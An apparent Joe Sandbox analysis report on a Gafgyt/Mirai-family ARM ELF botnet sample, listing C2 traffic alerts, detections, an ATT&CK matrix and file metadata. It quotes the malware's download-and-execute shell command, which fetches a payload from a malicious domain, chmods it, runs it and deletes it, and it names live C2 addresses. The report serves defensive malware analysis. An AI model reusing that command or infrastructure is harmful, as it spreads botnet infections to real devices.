2025-05-10T07:49:06.217459+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40810	TCP
2025-05-10T07:49:22.058608+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40812	TCP
2025-05-10T07:49:37.628760+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40814	TCP
2025-05-10T07:49:53.188763+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40816	TCP
2025-05-10T07:50:08.750909+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40818	TCP
2025-05-10T07:50:24.312854+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40820	TCP
2025-05-10T07:50:39.871661+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40822	TCP
2025-05-10T07:50:55.432758+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40824	TCP
2025-05-10T07:51:10.991025+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40826	TCP
2025-05-10T07:51:26.552501+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40828	TCP
2025-05-10T07:51:42.111035+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40830	TCP
2025-05-10T07:51:57.666832+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40832	TCP
2025-05-10T07:52:13.225744+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40834	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: armv4l.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: armv4l.elf	ReversingLabs: Detection: 68%
Source: armv4l.elf	Virustotal: Detection: 63%			Perma Link

Spreading

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/armv4l.elf (PID: 5509)

Opens: /proc/net/route

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40808
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40832
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40814
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40824
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40816
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40818
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40820
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40828
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40812
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40830
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40826
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40834
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40822
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40810

Source: global traffic

TCP traffic: 192.168.2.14:40808 -> 92.60.77.69:666

Source: /bin/sh (PID: 5523)

Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....

Jump to behavior

Source: /usr/bin/wget (PID: 5523)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69

Source: global traffic	DNS traffic detected: DNS query: gay.energy
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

System Summary

Malicious sample detected (through community Yara rule)

Source: armv4l.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Source: armv4l.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Source: classification engine

Classification label: mal92.spre.troj.linELF@0/0@6/0

Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/_memcpy.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/bcopy.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/bzero.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/memcpy.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/memmove.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/memset.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/strcmp.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/string/arm/strlen.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crt1.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crti.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/arm/crtn.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/arm/sigrestorer.S
Source: armv4l.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/arm/vfork.S

Source: /usr/bin/wget (PID: 5523)	File: /tmp/.....	Jump to behavior
Source: /bin/sh (PID: 5525)	Directory: /tmp/.....	Jump to behavior
Source: /bin/sh (PID: 5525)	Directory: /tmp/.....	Jump to behavior

Source: /usr/bin/wget (PID: 5523)

Empty hidden file: /tmp/.....

Jump to behavior

Source: /tmp/armv4l.elf (PID: 5511)

Shell command executed: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

Jump to behavior

Source: /bin/sh (PID: 5524)

Chmod executable: /usr/bin/chmod -> chmod 777 .....

Jump to behavior

Source: /bin/sh (PID: 5527)

Rm executable: /usr/bin/rm -> rm -rf .....

Jump to behavior

Source: /bin/sh (PID: 5523)

Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....

Jump to behavior

Source: /usr/bin/chmod (PID: 5524)

File: /tmp/..... (bits: - usr: rwx grp: rwx all: rwx)

Jump to behavior

Source: /bin/sh (PID: 5524)

Chmod executable with 777: /usr/bin/chmod -> chmod 777 .....

Jump to behavior

Source: /tmp/armv4l.elf (PID: 5509)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wget (PID: 5523)	Queries kernel information via 'uname':			Jump to behavior

Source: armv4l.elf, 5509.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5513.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5514.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/armv4l.elf
Source: armv4l.elf, 5509.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5513.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5514.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: armv4l.elf, 5509.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5513.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp, armv4l.elf, 5514.1.000055cb71b62000.000055cb71cb1000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: armv4l.elf, 5509.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5513.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp, armv4l.elf, 5514.1.00007ffeb5232000.00007ffeb5253000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match

File source: armv4l.elf, type: SAMPLE

Yara detected Mirai

Source: Yara match	File source: armv4l.elf, type: SAMPLE
Source: Yara match	File source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTR

Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Source: Initial sample	User agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: Initial sample	User agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Source: Initial sample	User agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

Remote Access Functionality

Yara detected Gafgyt

Source: Yara match

File source: armv4l.elf, type: SAMPLE

Yara detected Mirai

Source: Yara match	File source: armv4l.elf, type: SAMPLE
Source: Yara match	File source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 Hide Artifacts	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 File and Directory Permissions Modification	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
armv4l.elf	69%	ReversingLabs	Linux.Trojan.Gafgyt
armv4l.elf	63%	Virustotal		Browse
armv4l.elf	100%	Avira	LINUX/Gafgyt.opnd

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.24	true	false		high
gay.energy	unknown	unknown	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.60.77.69	unknown	Italy		5602	AS-IRIDEOS-KPIT	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
92.60.77.69	armv6l.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.25
	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.25
	x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.25
	arm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	arm6.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.24
	rep.arc.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	arm6.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	Space.arm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	Space.spc.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	O4WmcV1laq.elf	Get hash	malicious	Unknown	Browse	162.213.35.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-IRIDEOS-KPIT	armv6l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	92.60.77.69
	mipsel.elf	Get hash	malicious	Gafgyt, Mirai	Browse	92.60.77.69
	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	92.60.77.69
	x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	92.60.77.69
	armv4l.elf	Get hash	malicious	Unknown	Browse	193.28.95.59
	nullnet_load.arm7.elf	Get hash	malicious	Mirai	Browse	109.233.129.42
	8427xbk3Zt.elf	Get hash	malicious	Unknown	Browse	109.233.130.43

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, with debug_info, not stripped
Entropy (8bit):	6.068772811501425
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	armv4l.elf
File size:	143'416 bytes
MD5:	2e540f8ae41ef4c6b81b7e3f76fb10a4
SHA1:	63dbd55249baa1b541f72f3024b1e22d8e72d512
SHA256:	8a31d94ac6c21de724e8fb226b77aeeabd2780298850dcadbc05724b643c4ad8
SHA512:	2d66528f0186d8cc0d944e93f6a45ff18d6e26b8e5abd66565460d3784512d713354648e529ac7f4d8e9ff6cc04024e2a3dbf25116428343bb4d21c563a3b259
SSDEEP:	3072:ez3t4CFcrw1vqzq21FOr/gzZluXUUt0gLS22hH2sCmnoQhJUx3Nu:J6HvSAkZluX5t0gLUQmnoQhJUx3Nu
TLSH:	09E31830E454461BC2D223FAE79E825E3F321E9753A733115B387EB02FE27991E69524
File Content Preview:	.ELF...a..........(.........4...<.......4. ...(.....................X...X...........................@....j..........Q.td..................................-...L."...LQ..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	111164
Section Header Size:	40
Number of Section Headers:	20
Header String Table Index:	17

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x80b0	0xb0	0x14568	0x0	0x6	AX	0	0	16
